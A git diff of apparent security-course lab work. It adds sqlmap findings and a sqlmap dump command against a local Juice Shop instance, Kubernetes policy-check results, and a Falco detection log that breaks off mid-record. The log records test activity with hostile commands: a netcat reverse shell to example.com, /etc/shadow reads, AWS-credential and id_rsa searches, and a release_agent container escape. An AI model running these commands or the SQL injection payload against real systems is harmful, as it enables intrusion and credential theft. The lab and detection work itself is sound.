diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md
new file mode 100644
index 00000000..b65a6540
--- /dev/null
+++ b/.github/pull_request_template.md
@@ -0,0 +1,9 @@
+# Goal
+Submitting my homework for lab#
+
+# Changes
+- Added submissionXX.md
+
+# Checklist
+- [x] Task 1 done
+- [x] Task 2 done
\ No newline at end of file
diff --git a/labs/lab5/sqlmap/localhost/log b/labs/lab5/sqlmap/localhost/log
new file mode 100644
index 00000000..4cabc56c
--- /dev/null
+++ b/labs/lab5/sqlmap/localhost/log
@@ -0,0 +1,8 @@
+sqlmap identified the following injection point(s) with a total of 41 HTTP(s) requests:
+---
+Parameter: #1* (URI)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: http://localhost:3000/rest/products/search?q=') AND 6254=6254 AND ('jcto' LIKE 'jcto
+---
+back-end DBMS: SQLite
diff --git a/labs/lab5/sqlmap/localhost/session.sqlite b/labs/lab5/sqlmap/localhost/session.sqlite
new file mode 100644
index 00000000..bc78069a
Binary files /dev/null and b/labs/lab5/sqlmap/localhost/session.sqlite differ
diff --git a/labs/lab5/sqlmap/localhost/target.txt b/labs/lab5/sqlmap/localhost/target.txt
new file mode 100644
index 00000000..757e9155
--- /dev/null
+++ b/labs/lab5/sqlmap/localhost/target.txt
@@ -0,0 +1,3 @@
+http://localhost:3000/rest/user/login (POST) # /sqlmap/sqlmap.py -u http://localhost:3000/rest/user/login --data {\"email\":\"*\",\"password\":\"test\"} --method POST "--headers=Content-Type: application/json" --dbms=sqlite --batch --level=5 --risk=3 --technique=BT --threads=5 --output-dir=/output --dump
+
+{"email":"*","password":"test"}
\ No newline at end of file
diff --git a/labs/lab9/analysis/conftest-compose.txt b/labs/lab9/analysis/conftest-compose.txt
new file mode 100644
index 00000000..ca9d30b8
--- /dev/null
+++ b/labs/lab9/analysis/conftest-compose.txt
@@ -0,0 +1,2 @@
+
+15 tests, 15 passed, 0 warnings, 0 failures, 0 exceptions
diff --git a/labs/lab9/analysis/conftest-hardened.txt b/labs/lab9/analysis/conftest-hardened.txt
new file mode 100644
index 00000000..9da25fba
--- /dev/null
+++ b/labs/lab9/analysis/conftest-hardened.txt
@@ -0,0 +1,2 @@
+
+30 tests, 30 passed, 0 warnings, 0 failures, 0 exceptions
diff --git a/labs/lab9/analysis/conftest-unhardened.txt b/labs/lab9/analysis/conftest-unhardened.txt
new file mode 100644
index 00000000..ff1049f3
--- /dev/null
+++ b/labs/lab9/analysis/conftest-unhardened.txt
@@ -0,0 +1,12 @@
+WARN - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" should define livenessProbe
+WARN - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" should define readinessProbe
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.limits.cpu
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.limits.memory
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.requests.cpu
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.requests.memory
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set allowPrivilegeEscalation: false
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set readOnlyRootFilesystem: true
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set runAsNonRoot: true
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" uses disallowed :latest tag
+
+30 tests, 20 passed, 2 warnings, 8 failures, 0 exceptions
diff --git a/labs/lab9/falco/logs/falco.log b/labs/lab9/falco/logs/falco.log
new file mode 100644
index 00000000..afa5f075
--- /dev/null
+++ b/labs/lab9/falco/logs/falco.log
@@ -0,0 +1,36 @@ +{"hostname":"571ea5bf0330","output":"2026-05-12T16:50:06.030673234+0000: Notice A shell was spawned in a container with an attached terminal | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=systemd command=sh -lc echo hello-from-shell terminal=34816 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=41575d6baa96 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"41575d6baa96","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1778604606030673234,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -lc echo hello-from-shell","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pname":"systemd","proc.tty":34816,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Terminal shell in container","source":"syscall","tags":["T1059","container","maturity_stable","mitre_execution","shell"],"time":"2026-05-12T16:50:06.030673234Z"} +Events detected: 1 +Rule counts by severity: + NOTICE: 1 +Triggered rules by rule name: + Terminal shell in container: 1 +Events detected: 0 +Rule counts by severity: +Triggered rules by rule name: +Events detected: 0 +Rule counts by severity: +Triggered rules by rule name: +{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:34.229939671+0000: Warning Falco Custom: File write in /usr/local/bin (container=lab9-helper user=root file=/usr/local/bin/custom-rule.txt flags=O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER) container_id=41575d6baa96 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name= 
k8s_ns_name=","output_fields":{"container.id":"41575d6baa96","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER","evt.time.iso8601":1778604754229939671,"fd.name":"/usr/local/bin/custom-rule.txt","k8s.ns.name":null,"k8s.pod.name":null,"user.name":"root"},"priority":"Warning","rule":"Write Binary Under UsrLocalBin","source":"syscall","tags":["compliance","container","drift"],"time":"2026-05-12T16:52:34.229939671Z"} +{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:58.864367126+0000: Warning Debugfs launched started in a privileged container | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=debugfs proc_exepath=/usr/sbin/debugfs parent=event-generator command=debugfs -V terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1778604778864367126,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"debugfs -V","proc.exepath":"/usr/sbin/debugfs","proc.name":"debugfs","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Debugfs Launched in Privileged Container","source":"syscall","tags":["T1611","cis","container","maturity_stable","mitre_privilege_escalation","process"],"time":"2026-05-12T16:52:58.864367126Z"} +{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:58.965814587+0000: Warning Hardlinks created over sensitive files | target=/etc/shadow linkpath=/tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-2846876962/shadow_link 
evt_type=link user=root user_uid=0 user_loginuid=-1 process=ln proc_exepath=/bin/busybox parent=event-generator command=ln -v /etc/shadow /tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-2846876962/shadow_link terminal=0 container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.newpath":"/tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-2846876962/shadow_link","evt.arg.oldpath":"/etc/shadow","evt.time.iso8601":1778604778965814587,"evt.type":"link","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ln -v /etc/shadow /tmp/falco-event-generator-syscall-CreateHardlinkOverSensitiveFiles-2846876962/shadow_link","proc.exepath":"/bin/busybox","proc.name":"ln","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Create Hardlink Over Sensitive Files","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2026-05-12T16:52:58.965814587Z"} +{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:59.088252047+0000: Critical Fileless execution via memfd_create | container_start_ts=1778604777834119987 proc_cwd=/ evt_res=SUCCESS proc_sname=event-generator gparent=containerd-shim evt_type=execve user=root user_uid=0 user_loginuid=-1 process=3 proc_exepath=memfd:program parent=event-generator command=3 run helper.DoNothing terminal=0 exe_flags=EXE_WRITABLE|EXE_FROM_MEMFD container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= 
k8s_ns_name=","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","container.start_ts":1778604777834119987,"evt.arg.flags":"EXE_WRITABLE|EXE_FROM_MEMFD","evt.res":"SUCCESS","evt.time.iso8601":1778604779088252047,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"containerd-shim","proc.cmdline":"3 run helper.DoNothing","proc.cwd":"/","proc.exepath":"memfd:program","proc.name":"3","proc.pname":"event-generator","proc.sname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Critical","rule":"Fileless execution via memfd_create","source":"syscall","tags":["T1620","container","host","maturity_stable","mitre_defense_evasion","process"],"time":"2026-05-12T16:52:59.088252047Z"} +{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:59.412158919+0000: Notice Shell spawned by untrusted binary | parent_exe=/tmp/falco-event-generator-syscall-spawned-1220429766/httpd parent_exepath=/bin/event-generator pcmdline=httpd --loglevel info run ^helper.RunShell$ gparent=event-generator ggparent=containerd-shim aname[4]=systemd aname[5]= aname[6]= aname[7]= evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=httpd command=sh -c ls > /dev/null terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= 
k8s_ns_name=","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1778604779412158919,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"event-generator","proc.aname[3]":"containerd-shim","proc.aname[4]":"systemd","proc.aname[5]":null,"proc.aname[6]":null,"proc.aname[7]":null,"proc.cmdline":"sh -c ls > /dev/null","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pcmdline":"httpd --loglevel info run ^helper.RunShell$","proc.pexe":"/tmp/falco-event-generator-syscall-spawned-1220429766/httpd","proc.pexepath":"/bin/event-generator","proc.pname":"httpd","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Run shell untrusted","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution","process","shell"],"time":"2026-05-12T16:52:59.412158919Z"} +{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:59.609337428+0000: Notice Disallowed SSH Connection | connection=172.17.0.5:59408->172.66.147.243:443 lport=443 rport=59408 fd_type=ipv4 fd_proto=tcp evt_type=connect user=root user_uid=0 user_loginuid=-1 process=ssh proc_exepath=/usr/bin/ssh parent=event-generator command=ssh user@example.com -p 443 terminal=0 container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1778604779609337428,"evt.type":"connect","fd.l4proto":"tcp","fd.lport":443,"fd.name":"172.17.0.5:59408->172.66.147.243:443","fd.rport":59408,"fd.type":"ipv4","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ssh user@example.com -p 
443","proc.exepath":"/usr/bin/ssh","proc.name":"ssh","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Disallowed SSH Connection Non Standard Port","source":"syscall","tags":["T1059","container","host","maturity_stable","mitre_execution","network","process"],"time":"2026-05-12T16:52:59.609337428Z"} +{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:59.755834434+0000: Warning Sensitive file opened for reading by non-trusted program | file=/etc/shadow gparent=systemd ggparent= gggparent= evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1778604779755834434,"evt.type":"openat","fd.name":"/etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"systemd","proc.aname[3]":null,"proc.aname[4]":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Read sensitive file untrusted","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2026-05-12T16:52:59.755834434Z"} +{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:59.856362943+0000: Warning File execution detected from /dev/shm | evt_res=SUCCESS file= proc_cwd=/ proc_pcmdline=event-generator run syscall user_loginname= group_gid=0 group_name=root evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh 
proc_exepath=/bin/busybox parent=event-generator command=sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-PKj6kq.sh terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.res":"SUCCESS","evt.time.iso8601":1778604779856362943,"evt.type":"execve","fd.name":null,"group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-PKj6kq.sh","proc.cwd":"/","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginname":"","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Execution from /dev/shm","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution"],"time":"2026-05-12T16:52:59.856362943Z"} +{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:59.856515719+0000: Warning File execution detected from /dev/shm | evt_res=EACCES file= proc_cwd=/ proc_pcmdline=event-generator run syscall user_loginname= group_gid=0 group_name=root evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=event-generator command=sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-PKj6kq.sh terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= 
k8s_ns_name=","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.res":"EACCES","evt.time.iso8601":1778604779856515719,"evt.type":"execve","fd.name":null,"group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-PKj6kq.sh","proc.cwd":"/","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginname":"","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Execution from /dev/shm","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution"],"time":"2026-05-12T16:52:59.856515719Z"} +{"hostname":"571ea5bf0330","output":"2026-05-12T16:52:59.956967461+0000: Warning Log files were tampered | file=/tmp/falco-event-generator-syscall-ClearLogActivities-4136259843/syslog evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1778604779956967461,"evt.type":"openat","fd.name":"/tmp/falco-event-generator-syscall-ClearLogActivities-4136259843/syslog","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run 
syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Clear Log Activities","source":"syscall","tags":["NIST_800-53_AU-10","T1070","container","filesystem","host","maturity_stable","mitre_defense_evasion"],"time":"2026-05-12T16:52:59.956967461Z"} +{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:00.057451498+0000: Notice Detected potential PTRACE_TRACEME anti-debug attempt | proc_pcmdline=event-generator run syscall evt_type=ptrace user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=event-generator command=event-generator run syscall terminal=0 container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1778604780057451498,"evt.type":"ptrace","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"PTRACE anti-debug attempt","source":"syscall","tags":["T1622","container","host","maturity_stable","mitre_defense_evasion","process"],"time":"2026-05-12T16:53:00.057451498Z"} +{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:00.258248742+0000: Warning Detected AWS credentials search activity | proc_pcmdline=event-generator run syscall proc_cwd=/ group_gid=0 group_name=root user_loginname= evt_type=execve user=root user_uid=0 user_loginuid=-1 process=find proc_exepath=/bin/busybox parent=event-generator command=find /tmp 
-maxdepth 1 -iname .aws/credentials terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1778604780258248742,"evt.type":"execve","group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"find /tmp -maxdepth 1 -iname .aws/credentials","proc.cwd":"/","proc.exepath":"/bin/busybox","proc.name":"find","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginname":"","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Find AWS Credentials","source":"syscall","tags":["T1552","aws","container","host","maturity_stable","mitre_credential_access","process"],"time":"2026-05-12T16:53:00.258248742Z"} +{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:00.358643284+0000: Warning Read monitored file via directory traversal | file=/etc/shadow fileraw=/etc/../etc/../etc/shadow gparent=systemd ggparent= gggparent= evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= 
k8s_ns_name=","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1778604780358643284,"evt.type":"openat","fd.name":"/etc/shadow","fd.nameraw":"/etc/../etc/../etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"systemd","proc.aname[3]":null,"proc.aname[4]":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Directory traversal monitored file read","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2026-05-12T16:53:00.358643284Z"} +{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:00.459127889+0000: Warning Bulk data has been removed from disk | file= evt_type=execve user=root user_uid=0 user_loginuid=-1 process=shred proc_exepath=/bin/busybox parent=event-generator command=shred -u /tmp/falco-event-generator-syscall-RemoveBulkDataFromDisk-2515572500 terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1778604780459127889,"evt.type":"execve","fd.name":null,"k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"shred -u /tmp/falco-event-generator-syscall-RemoveBulkDataFromDisk-2515572500","proc.exepath":"/bin/busybox","proc.name":"shred","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Remove Bulk Data 
from Disk","source":"syscall","tags":["T1485","container","filesystem","host","maturity_stable","mitre_impact","process"],"time":"2026-05-12T16:53:00.459127889Z"} +{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:00.561041492+0000: Notice Packet socket was created in a container | socket_info=fd=6() domain=17(AF_PACKET) type=3 proto=3 connection= lport= rport= fd_type= fd_proto= evt_type=socket user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.args":"fd=6() domain=17(AF_PACKET) type=3 proto=3","evt.time.iso8601":1778604780561041492,"evt.type":"socket","fd.l4proto":"","fd.lport":null,"fd.name":"","fd.rport":null,"fd.type":"","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Packet socket created in container","source":"syscall","tags":["T1557.002","container","maturity_stable","mitre_credential_access","network"],"time":"2026-05-12T16:53:00.561041492Z"} +{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:00.666240911+0000: Informational System user ran an interactive command | evt_type=execve user=daemon user_uid=2 user_loginuid=-1 process=login proc_exepath=/bin/busybox parent=event-generator command=login terminal=0 exe_flags=EXE_LOWER_LAYER container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= 
k8s_ns_name=","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_LOWER_LAYER","evt.time.iso8601":1778604780666240911,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"login","proc.exepath":"/bin/busybox","proc.name":"login","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"daemon","user.uid":2},"priority":"Informational","rule":"System user interactive","source":"syscall","tags":["NIST_800-53_AC-2","T1059","container","host","maturity_stable","mitre_execution","users"],"time":"2026-05-12T16:53:00.666240911Z"} +{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:00.873326499+0000: Critical Detect an attempt to exploit a container escape using release_agent file | file=/release_agent cap_effective=CAP_CHOWN CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_FOWNER CAP_FSETID CAP_KILL CAP_SETGID CAP_SETUID CAP_SETPCAP CAP_LINUX_IMMUTABLE CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_ADMIN CAP_NET_RAW CAP_IPC_LOCK CAP_IPC_OWNER CAP_SYS_MODULE CAP_SYS_RAWIO CAP_SYS_CHROOT CAP_SYS_PTRACE CAP_SYS_PACCT CAP_SYS_ADMIN CAP_SYS_BOOT CAP_SYS_NICE CAP_SYS_RESOURCE CAP_SYS_TIME CAP_SYS_TTY_CONFIG CAP_MKNOD CAP_LEASE CAP_AUDIT_WRITE CAP_AUDIT_CONTROL CAP_SETFCAP CAP_MAC_OVERRIDE CAP_MAC_ADMIN CAP_SYSLOG CAP_WAKE_ALARM CAP_BLOCK_SUSPEND CAP_AUDIT_READ CAP_PERFMON CAP_BPF CAP_CHECKPOINT_RESTORE evt_type=open user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=event-generator command=sh -c echo 'hello world' > release_agent terminal=0 container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= 
k8s_ns_name=","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1778604780873326499,"evt.type":"open","fd.name":"/release_agent","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -c echo 'hello world' > release_agent","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pname":"event-generator","proc.tty":0,"thread.cap_effective":"CAP_CHOWN CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_FOWNER CAP_FSETID CAP_KILL CAP_SETGID CAP_SETUID CAP_SETPCAP CAP_LINUX_IMMUTABLE CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_ADMIN CAP_NET_RAW CAP_IPC_LOCK CAP_IPC_OWNER CAP_SYS_MODULE CAP_SYS_RAWIO CAP_SYS_CHROOT CAP_SYS_PTRACE CAP_SYS_PACCT CAP_SYS_ADMIN CAP_SYS_BOOT CAP_SYS_NICE CAP_SYS_RESOURCE CAP_SYS_TIME CAP_SYS_TTY_CONFIG CAP_MKNOD CAP_LEASE CAP_AUDIT_WRITE CAP_AUDIT_CONTROL CAP_SETFCAP CAP_MAC_OVERRIDE CAP_MAC_ADMIN CAP_SYSLOG CAP_WAKE_ALARM CAP_BLOCK_SUSPEND CAP_AUDIT_READ CAP_PERFMON CAP_BPF CAP_CHECKPOINT_RESTORE","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Critical","rule":"Detect release_agent File Container Escapes","source":"syscall","tags":["T1611","container","maturity_stable","mitre_privilege_escalation","process"],"time":"2026-05-12T16:53:00.873326499Z"} +{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:00.973853620+0000: Warning Netcat runs inside container that allows remote code execution | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=nc proc_exepath=/usr/bin/nc parent=event-generator command=nc -e /bin/sh example.com 22 terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=620ecad49db3 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= 
k8s_ns_name=","output_fields":{"container.id":"620ecad49db3","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1778604780973853620,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"nc -e /bin/sh example.com 22","proc.exepath":"/usr/bin/nc","proc.name":"nc","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Netcat Remote Code Execution in Container","source":"syscall","tags":["T1059","container","maturity_stable","mitre_execution","network","process"],"time":"2026-05-12T16:53:00.973853620Z"} +{"hostname":"571ea5bf0330","output":"2026-05-12T16:53:01.074549022+0000: Warning Grep private keys or passwords activities found | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=find proc_exepath=/bin/busybox parent=event-generator command=find /tmp -maxdepth 1 -iname id_rsa terminal=0 